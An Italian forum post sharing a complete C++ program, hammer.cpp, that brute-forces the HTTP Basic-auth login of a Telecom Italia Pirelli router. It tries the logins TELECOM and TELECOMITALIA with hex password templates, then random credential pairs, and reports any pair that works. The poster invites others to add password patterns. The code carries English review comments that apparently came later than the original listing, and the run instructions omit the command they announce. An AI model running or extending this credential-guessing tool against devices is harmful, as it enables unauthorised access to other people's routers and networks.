Ciao a tutti! Sono anch'io uno sfortunato possessore del brutto ufo :(, nella sua specie peggiore! (1.0.2 :x)... Ho scritto un programmino che prova un po' di password a caso; lo posto qui così, se qualcuno ha qualche buona idea, può modificarlo per provare altre password! :twisted: :D
1) create un file di testo, copiateci il codice e salvatelo come hammer.cpp da qualche parte;
2) aprite un terminale, e andate nella directory dove avete salvato il file hammer.cpp, usando il comando:
Se funziona, dovrebbe fermarsi e stampare ad un certo punto la login/ password trovata, se no va avanti un bel po e poi smette (un bel po = qualche anno... :) )... io non ho mai potuto provarlo con un pirelli 1.0.1, cosi' non so se funziona veramente, se qualcuno ha la possibilita' prova!? grazie! :)
Non dovrebbe fare danni, visto che si limita a fare delle richieste http... praticamente e' come se provaste a mano tutte le password da un web browser, nulla piu'...
Pyper.
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <fcntl.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <ctype.h>
#include <iostream>
#include <time.h>
#include <sys/time.h>
using namespace std;
// *********************************************************
// *** Things to encode base64 password for http request ***
// *********************************************************
// code copied somewhere don't remember where ! thanks ! :)
// Standard base64 alphabet: the index is the 6-bit value, the element is the output character.
static const char base64digits[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
// Marker stored in the decode table for bytes that are not base64 digits.
// NOTE(review): the macro body is not parenthesised; `(-1)` would be safer inside larger expressions.
#define BAD -1
// Reverse table: ASCII code (0..127) -> 6-bit value, or BAD.
// Only '+', '/', '0'-'9', 'A'-'Z' and 'a'-'z' map to a value.
// NOTE(review): the element type is plain char; on a target where char is unsigned the
// BAD entries cannot hold -1 — confirm before relying on comparisons against BAD.
static const char base64val[] = {
BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD,
BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD,
BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD, 62, BAD,BAD,BAD, 63,
52, 53, 54, 55, 56, 57, 58, 59, 60, 61,BAD,BAD, BAD,BAD,BAD,BAD,
BAD, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25,BAD, BAD,BAD,BAD,BAD,
BAD, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51,BAD, BAD,BAD,BAD,BAD
};
// Decode one character; the isascii() guard keeps the index inside the 128-entry table.
// Neither this macro nor base64val is used anywhere else in this listing (only encoding is done).
#define DECODE64(c) (isascii(c) ? base64val[c] : BAD)
/**
 * Base64-encode `inlen` bytes from `in` into `out` as a NUL-terminated string.
 *
 * Every complete 3-byte group yields 4 output characters; a trailing 1- or
 * 2-byte remainder is emitted as one final 4-character group padded with '='.
 * The function performs no bounds checking on `out`: the caller must provide
 * at least 4 * ((inlen + 2) / 3) + 1 bytes.
 */
void to64frombits(unsigned char *out, const unsigned char *in, int inlen) {
    // Complete groups: three input bytes become four alphabet characters.
    while (inlen >= 3) {
        out[0] = base64digits[in[0] >> 2];
        out[1] = base64digits[((in[0] << 4) & 0x30) | (in[1] >> 4)];
        out[2] = base64digits[((in[1] << 2) & 0x3c) | (in[2] >> 6)];
        out[3] = base64digits[in[2] & 0x3f];
        out += 4;
        in += 3;
        inlen -= 3;
    }

    // Remainder of one or two bytes: emit a padded final group.
    if (inlen > 0) {
        const bool has_second = (inlen > 1);
        out[0] = base64digits[in[0] >> 2];
        unsigned char middle = (in[0] << 4) & 0x30;
        if (has_second) {
            middle |= in[1] >> 4;
        }
        out[1] = base64digits[middle];
        if (has_second) {
            out[2] = base64digits[(in[1] << 2) & 0x3c];
        } else {
            out[2] = '=';
        }
        out[3] = '=';
        out += 4;
    }

    *out = '\0';
}
// *******************************************************
// *** Try doing an http request to the ugly pirellone ***
// *******************************************************
// Destination address shared by every request: main() fills it in (family, IPv4 address,
// port 80) before the try_* functions run, and try_hammering() passes it to connect().
// NOTE(review): identifiers containing a double underscore are reserved for the
// implementation in C++; a rename has to touch every user of this global at once.
struct sockaddr_in __Pirellone_Address;
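/**
 * Issue one HTTP/1.0 GET for /doc/index.html carrying a Basic Authorization
 * header built from `login:passwd`, then look at the first 64 bytes of the reply.
 *
 * If the reply does not contain the text "401", the pair is reported on both
 * stderr and stdout and the process exits with status 0. Otherwise the socket
 * is closed and false is returned.
 *
 * Memory-safety and resource fixes relative to the original listing:
 *  - the base64 output buffer is sized from the credential buffer, so a long
 *    login/password can no longer overflow it (the original encoded up to 511
 *    bytes into a 128-byte array);
 *  - the reply buffer is always NUL-terminated before strstr() scans it;
 *  - read() returning 0 (EOF) or -1 ends the read loop instead of spinning
 *    forever or moving the write index backwards;
 *  - the socket is closed when connect() fails, so retries no longer leak
 *    descriptors;
 *  - over-long input and failed writes are rejected instead of being sent
 *    truncated.
 *
 * NOTE(review): Basic auth over plain HTTP puts the credentials on the wire in
 * base64, which is an encoding and not encryption. On the device side, a run of
 * requests like this shows up as a dense series of 401 responses to one client.
 * NOTE(review): "no 401 in the first 64 bytes" is treated as success, so any
 * other status line (an error page, a redirect) is also reported as FOUND.
 *
 * @param login   NUL-terminated user name.
 * @param passwd  NUL-terminated password.
 * @return false when the pair was rejected or the exchange could not be
 *         completed; the function does not return on success (it calls exit(0)).
 */
bool try_hammering(const char *login, const char *passwd) {
    int sockfd;
    // Keep retrying until a TCP connection is established (unbounded, as in the original).
    while (1) {
        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
            std::cerr << "Error in socket creation(" << errno << ":" << strerror(errno) << ").\n";
        } else if (connect(sockfd, (const sockaddr *)&__Pirellone_Address, sizeof(__Pirellone_Address)) == -1) {
            std::cerr << "Error in socket (" << sockfd << ") connection (" << errno << ":" << strerror(errno) << ").\n";
            close(sockfd);  // release the descriptor before the next attempt
        } else break;
    }

    char cred[256];
    char enc[4 * ((sizeof(cred) + 2) / 3) + 1];  // worst-case base64 length of cred, plus NUL
    char req[512];
    char inb[65];                                // 64 reply bytes plus a terminating NUL

    // Build "login:passwd"; refuse input that would be truncated.
    const int cred_len = snprintf(cred, sizeof(cred), "%s:%s", login, passwd);
    if (cred_len < 0 || static_cast<size_t>(cred_len) >= sizeof(cred)) {
        close(sockfd);
        return false;
    }
    to64frombits(reinterpret_cast<unsigned char *>(enc),
                 reinterpret_cast<const unsigned char *>(cred), cred_len);

    const int req_len = snprintf(req, sizeof(req),
                                 "GET /doc/index.html HTTP/1.0\r\nAuthorization: Basic %s\r\n\r\n", enc);
    if (req_len < 0 || static_cast<size_t>(req_len) >= sizeof(req)) {
        close(sockfd);
        return false;
    }

    // Send the whole request, coping with short writes.
    size_t sent = 0;
    while (sent < static_cast<size_t>(req_len)) {
        const ssize_t n = write(sockfd, req + sent, static_cast<size_t>(req_len) - sent);
        if (n < 0 && errno == EINTR) continue;
        if (n <= 0) break;
        sent += static_cast<size_t>(n);
    }
    if (sent < static_cast<size_t>(req_len)) {
        close(sockfd);
        return false;
    }

    // Read up to 64 bytes of the reply; stop on EOF or error.
    size_t got = 0;
    while (got < sizeof(inb) - 1) {
        const ssize_t n = read(sockfd, inb + got, sizeof(inb) - 1 - got);
        if (n < 0 && errno == EINTR) continue;
        if (n <= 0) break;
        got += static_cast<size_t>(n);
    }
    inb[got] = '\0';

    // Nothing came back: there is no status line to judge, so report "not found".
    if (got == 0) {
        close(sockfd);
        return false;
    }

    const bool good = (strstr(inb, "401") == nullptr);  // no "401 Unauthorized" seen in the reply prefix
    if (good) {
        std::cerr << "FOUND: login:" << login << " passwd:" << passwd << "\n";
        std::cout << "FOUND: login:" << login << " passwd:" << passwd << "\n";
        close(sockfd);
        exit(0);
    }
    close(sockfd);
    return good;
}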
// Try some tabled login/passwd
// Fixed user names tried by try_some() and try_brute(); the list ends at the null entry.
static const char *try_login[] = {
"TELECOM",
"TELECOMITALIA",
0L
};
// Password templates used by try_some(). Each entry is passed to snprintf() as the
// format string with a single int argument, so every entry must contain exactly one
// integer conversion (here a 4-digit hex field). The list ends at the null entry.
static const char *try_passwd[] = {
"%04x",
"%04X",
"pi%04xsl",
"PI%04XSL",
"pi%04Xsl",
"PI%04xSL",
0L
};
/**
 * Walk the try_login table and, for each entry, every template in try_passwd
 * expanded with each 16-bit value (0..65535), handing each resulting pair to
 * try_hammering(). Progress goes to stderr: the login, the template, and a
 * counter line every 1980 values.
 */
void try_some() {
    for (const char *const *login = try_login; *login != nullptr; ++login) {
        std::cerr << "Try login <" << *login << ">.\n";
        for (const char *const *tmpl = try_passwd; *tmpl != nullptr; ++tmpl) {
            std::cerr << "Try passwd 16bit template <" << *tmpl << ">.\n";
            unsigned int value = 0;
            while (value < 65536) {
                if (value % 1980 == 0) {
                    std::cerr << "..." << value << "\n";
                }
                // The template comes from the static table above, never from input.
                char candidate[128];
                snprintf(candidate, sizeof(candidate), *tmpl, (int)value);
                try_hammering(*login, candidate);
                ++value;
            }
        }
    }
}
// Characters used by try_brute(): digits, lower-case and upper-case letters.
// NOTE(review): sizeof(brute_chars) also counts the terminating NUL, so an index taken
// modulo sizeof(brute_chars) can land on '\0' and cut the generated string short.
static const char brute_chars[] = "0123456789abcdefghijklmnopqrstuvxywzABCDEFGHIJKLMNOPQRSTUVWXYZ";
/**
 * Run 100000000 rounds of randomly generated login/password pairs.
 *
 * Each round picks a login length of 4..12 and a password length of 3..12,
 * fills both buffers with characters chosen via random() from brute_chars,
 * calls try_hammering() with the random pair, and then calls it again with
 * each fixed login from try_login and the same random password. A progress
 * line with the previous round's pair is written to stderr every 1980 rounds.
 */
void try_brute() {
    char login_buf[14] = {0};
    char pass_buf[14] = {0};
    std::cerr << "Trying luckyness ! :)\n";

    unsigned int round = 0;
    while (round < 100000000) {
        if (round % 1980 == 0) {
            std::cerr << "..." << round << " (" << login_buf << ":" << pass_buf << ").\n";
        }

        // Lengths are drawn first, login then password, before any character.
        const unsigned int login_len = 4 + random() % (sizeof(login_buf) - 5);
        const unsigned int pass_len = 3 + random() % (sizeof(pass_buf) - 4);
        login_buf[login_len] = 0;
        pass_buf[pass_len] = 0;

        for (char *c = login_buf; c != login_buf + login_len; ++c) {
            *c = brute_chars[random() % sizeof(brute_chars)];
        }
        for (char *c = pass_buf; c != pass_buf + pass_len; ++c) {
            *c = brute_chars[random() % sizeof(brute_chars)];
        }

        try_hammering(login_buf, pass_buf);
        for (const char *const *name = try_login; *name != nullptr; ++name) {
            try_hammering(*name, pass_buf);
        }
        ++round;
    }
}
// *****************************************
// *** Main does inits and tries passwds ***
// *****************************************
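/**
 * Entry point: seed the PRNG, resolve the target host (argv[1], or 10.0.0.2
 * when no argument is given), fill in the global destination address for
 * TCP port 80, then run try_some() followed by try_brute().
 *
 * Changes relative to the original listing:
 *  - the resolved address is copied only when it is an IPv4 address of the
 *    expected length, so the copy into sin_addr can no longer run past the
 *    4-byte field (the original copied h_length bytes unchecked);
 *  - a failed lookup exits with status 1 instead of 0, so callers can tell
 *    failure from success;
 *  - memset/memcpy from <string.h> replace bzero/bcopy, whose header
 *    (<strings.h>) the file never includes.
 *
 * NOTE(review): gethostbyname() is obsolete and not thread-safe; getaddrinfo()
 * is the usual replacement. random() seeded from the clock is not a
 * cryptographic generator; here it only selects guesses.
 */
int main(int argc, char *argv[]) {
    // Init random seed
    struct timeval t;
    gettimeofday(&t, 0L);
    srandom(t.tv_sec ^ t.tv_usec);

    // Set host name
    const char *host_name = (argc < 2) ? "10.0.0.2" : argv[1];

    // Find out Pirellone address
    struct hostent *server = gethostbyname(host_name);
    if (server == NULL) {
        std::cerr << "No pirellone at <" << host_name << ">.\n";
        return 1;
    }
    // Only an IPv4 result of exactly sizeof(s_addr) bytes fits the destination field.
    if (server->h_addrtype != AF_INET ||
        server->h_length != static_cast<int>(sizeof(__Pirellone_Address.sin_addr.s_addr)) ||
        server->h_addr_list == NULL || server->h_addr_list[0] == NULL) {
        std::cerr << "Address of <" << host_name << "> is not a usable IPv4 address.\n";
        return 1;
    }

    int portno = 80; // http port
    memset(&__Pirellone_Address, 0, sizeof(__Pirellone_Address));
    __Pirellone_Address.sin_family = AF_INET;
    memcpy(&__Pirellone_Address.sin_addr.s_addr, server->h_addr_list[0],
           sizeof(__Pirellone_Address.sin_addr.s_addr));
    __Pirellone_Address.sin_port = htons(portno);

    // Let's try some patterns
    try_some();
    try_brute();
    // Add more here...
    return 0;
}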